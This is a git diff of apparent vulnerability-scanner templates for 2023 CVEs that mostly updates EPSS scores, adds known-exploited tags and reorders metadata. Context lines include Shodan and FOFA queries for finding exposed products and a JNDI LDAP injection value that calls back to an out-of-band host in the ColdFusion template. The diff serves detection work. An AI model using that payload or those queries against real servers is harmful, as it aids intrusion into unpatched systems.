cwe-id: CWE-287 - epss-score: 0.75551 - epss-percentile: 0.9787 + epss-score: 0.71629 + epss-percentile: 0.97786 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index dfe67b8556..de32e0cd9f 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2813 cwe-id: CWE-79 - epss-score: 0.00219 - epss-percentile: 0.59658 + epss-score: 0.00183 + epss-percentile: 0.55614 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,6 @@ info: product: connections_reloaded framework: wordpress tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza - variables: str: "{{rand_base(6)}}" random: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index ac815747ce..b0dd3f5604 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 - epss-score: 0.02633 - epss-percentile: 0.89207 + epss-score: 0.02858 + epss-percentile: 0.89677 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index f777e31a04..f4205ab237 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.06942 - epss-percentile: 0.93215 + epss-score: 0.06519 + epss-percentile: 0.93035 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index ae4e000096..fbcc9cc062 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.27375 - epss-percentile: 0.96319 + epss-score: 0.32424 + epss-percentile: 0.96608 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 92f830169f..3739aacb5e 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.14743 - epss-percentile: 0.95236 + epss-score: 0.14173 + epss-percentile: 0.95179 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 44fcd4d80b..3d410c447f 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38038 + epss-percentile: 0.38107 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 0230aa6c14..7552ac8c1d 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.37695 - epss-percentile: 0.96835 + epss-score: 0.42947 + epss-percentile: 0.97005 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 05e442f079..af8ea4e440 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.73374 - epss-percentile: 0.97807 + epss-score: 0.7713 + epss-percentile: 0.97934 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 8cdf09b247..8eb99def84 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.11097 - epss-percentile: 0.94585 + epss-score: 0.93305 + epss-percentile: 0.9889 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,7 +27,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" - tags: cve,cve2023,adobe,rce,coldfusion,deserialization + tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/rcrzfd" diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 642524ab39..0aef9c6254 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-29357 - epss-score: 0.68801 - epss-percentile: 0.97673 + epss-score: 0.10699 + epss-percentile: 0.94525 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: sharepoint_server shodan-query: http.headers_hash:-1968878704 fofa-query: app="Microsoft-SharePoint" - tags: cve,cve2023,microsoft,sharepoint_server + tags: cve,cve2023,microsoft,sharepoint_server,kev variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index 773fb8ffd4..2c7488be38 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29439 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.3693 + epss-score: 0.00087 + epss-percentile: 0.3593 cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 02d3ea61f9..62da64285e 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00167 - epss-percentile: 0.53202 + epss-score: 0.00206 + epss-percentile: 0.58511 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 2dc688f492..1429357f1f 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29622 cwe-id: CWE-89 - epss-score: 0.01714 - epss-percentile: 0.86411 + epss-score: 0.01215 + epss-percentile: 0.83777 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index f016b66f39..59cdacd35a 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-29623 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39686 + epss-percentile: 0.3975 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 15da03f5aa..f09d57935f 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 - epss-score: 0.01097 - epss-percentile: 0.82728 + epss-score: 0.01383 + epss-percentile: 0.84899 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index ef9659afd7..18752529ba 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-29887 cwe-id: CWE-22 epss-score: 0.00439 - epss-percentile: 0.71929 + epss-percentile: 0.721 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index a70ebf48fa..da0aba6ba9 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-29919 cwe-id: CWE-276 epss-score: 0.01262 - epss-percentile: 0.84053 + epss-percentile: 0.84151 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 52e3fed8ba..2d10e83db8 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00546 - epss-percentile: 0.74803 + epss-score: 0.00791 + epss-percentile: 0.79603 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index b0f63da447..29636b8d9b 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-29923 cwe-id: CWE-276 epss-score: 0.00336 - epss-percentile: 0.68083 + epss-percentile: 0.68252 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 6d4763125c..78064cb857 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30013 cwe-id: CWE-78 - epss-score: 0.9257 - epss-percentile: 0.98769 + epss-score: 0.94437 + epss-percentile: 0.99039 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 2575597736..b433013d54 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30019 cwe-id: CWE-918 epss-score: 0.00094 - epss-percentile: 0.39281 + epss-percentile: 0.3934 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 1c3efab831..976e8ebed5 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-30150 cwe-id: CWE-89 epss-score: 0.02634 - epss-percentile: 0.89208 + epss-percentile: 0.89268 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index a1ccdac2f2..86a4796595 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-30210 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29249 + epss-percentile: 0.29205 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index e604e1a839..68f2b2a74e 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30212 cwe-id: CWE-79 - epss-score: 0.02614 - epss-percentile: 0.89163 + epss-score: 0.02579 + epss-percentile: 0.89149 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 90da2790d6..9961224a8e 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-30256 cwe-id: CWE-79 epss-score: 0.01651 - epss-percentile: 0.86176 + epss-percentile: 0.86217 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index 908cb51cfe..20cb3474f7 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30258 cwe-id: CWE-78 - epss-score: 0.37667 - epss-percentile: 0.96833 + epss-score: 0.48813 + epss-percentile: 0.97205 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 7401793560..4c96d470c2 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -6,22 +6,27 @@ info: severity: medium description: | Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24. + remediation: This issue has been addressed in version 1.2.25. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p - https://nvd.nist.gov/vuln/detail/CVE-2023-30534 - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25 - remediation: This issue has been addressed in version 1.2.25. + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/ + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2023-30534 cwe-id: CWE-502 - epss-score: 0.00073 - epss-percentile: 0.30351 + epss-score: 0.09326 + epss-percentile: 0.94128 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: - shodan-query: title:"Cacti" verified: "true" + max-request: 4 + vendor: cacti + product: cacti + shodan-query: title:"Cacti" tags: cve,cve2023,cacti,authenticated http: diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 59df8e081c..903a7b9b0d 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 - epss-score: 0.94142 - epss-percentile: 0.98968 + epss-score: 0.93708 + epss-percentile: 0.98938 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 4f2853ca57..02e76ed027 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 - epss-score: 0.00273 - epss-percentile: 0.64433 + epss-score: 0.00269 + epss-percentile: 0.64351 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index 8b8bf3c5d7..069d5bf794 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30868 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28438 + epss-percentile: 0.28403 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 7e0ecb6ab7..8cdc577ce7 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30943 cwe-id: CWE-610,CWE-73 - epss-score: 0.01938 - epss-percentile: 0.87338 + epss-score: 0.02185 + epss-percentile: 0.88239 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 186834ffda..097386815f 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-31059 cwe-id: CWE-22 epss-score: 0.00393 - epss-percentile: 0.70439 + epss-percentile: 0.70614 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 103fa6e84f..e239d9ac9e 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-31465 epss-score: 0.00841 - epss-percentile: 0.80144 + epss-percentile: 0.80245 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index e5d1c7d2f3..15a53917f4 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-31548 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32141 + epss-percentile: 0.32079 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index e03e5c39e5..22d24002f8 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-3219 cwe-id: CWE-639 - epss-score: 0.45245 - epss-percentile: 0.97052 + epss-score: 0.17304 + epss-percentile: 0.95627 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index ccb5d63285..60551a8119 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32235 cwe-id: CWE-22 - epss-score: 0.00998 - epss-percentile: 0.81849 + epss-score: 0.01376 + epss-percentile: 0.84873 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 1cc37bed8b..64c683f383 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-32243 cwe-id: CWE-287 epss-score: 0.03567 - epss-percentile: 0.9061 + epss-percentile: 0.90679 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 5aee7724ae..ec3b07feeb 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.96151 - epss-percentile: 0.99368 + epss-score: 0.96352 + epss-percentile: 0.99447 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 5a66c6b428..3753202d02 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.35418 - epss-percentile: 0.96721 + epss-score: 0.43261 + epss-percentile: 0.97013 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 4b3817e0f4..2deadef715 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-33338 cwe-id: CWE-89 epss-score: 0.00761 - epss-percentile: 0.79035 + epss-percentile: 0.79129 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index e795064cc0..c4a444ca32 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33405 cwe-id: CWE-601 epss-score: 0.00071 - epss-percentile: 0.29223 + epss-percentile: 0.29179 cpe: cpe:2.3:a:blogengine:blogengine.net:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index f63a146e5a..27aa99bf93 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-33439 cwe-id: CWE-89 epss-score: 0.00666 - epss-percentile: 0.77392 + epss-percentile: 0.77495 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 8e56092c29..d6c79fb770 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-33440 cwe-id: CWE-434 epss-score: 0.05129 - epss-percentile: 0.92118 + epss-percentile: 0.92178 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 3db018a6e5..9c086299e1 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3345 cwe-id: CWE-200 epss-score: 0.00235 - epss-percentile: 0.61349 + epss-percentile: 0.61522 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 39e8c74ebb..4b95f158f6 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-33510 cwe-id: CWE-668 epss-score: 0.00347 - epss-percentile: 0.68531 + epss-percentile: 0.687 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 6d0874edbb..64f45fde4e 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33568 cwe-id: CWE-552 - epss-score: 0.68097 - epss-percentile: 0.97658 + epss-score: 0.62868 + epss-percentile: 0.97558 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 6b885f9303..0cb400ed74 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33584 cwe-id: CWE-89 epss-score: 0.05622 - epss-percentile: 0.92489 + epss-percentile: 0.92535 cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 0df752c2c9..aa5d47765c 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33629 cwe-id: CWE-787 - epss-score: 0.00534 - epss-percentile: 0.74529 + epss-score: 0.00859 + epss-percentile: 0.8044 cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 07e71937f1..737d7c29e3 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3368 cwe-id: CWE-78 epss-score: 0.76057 - epss-percentile: 0.97882 + epss-percentile: 0.97902 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 5f3fa66c96..0fcab907da 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 - epss-score: 0.05267 - epss-percentile: 0.92214 + epss-score: 0.04822 + epss-percentile: 0.91936 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 48cc8354f9..a8b9977099 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 - epss-score: 0.0189 - epss-percentile: 0.87138 + epss-score: 0.01574 + epss-percentile: 0.85894 cpe: 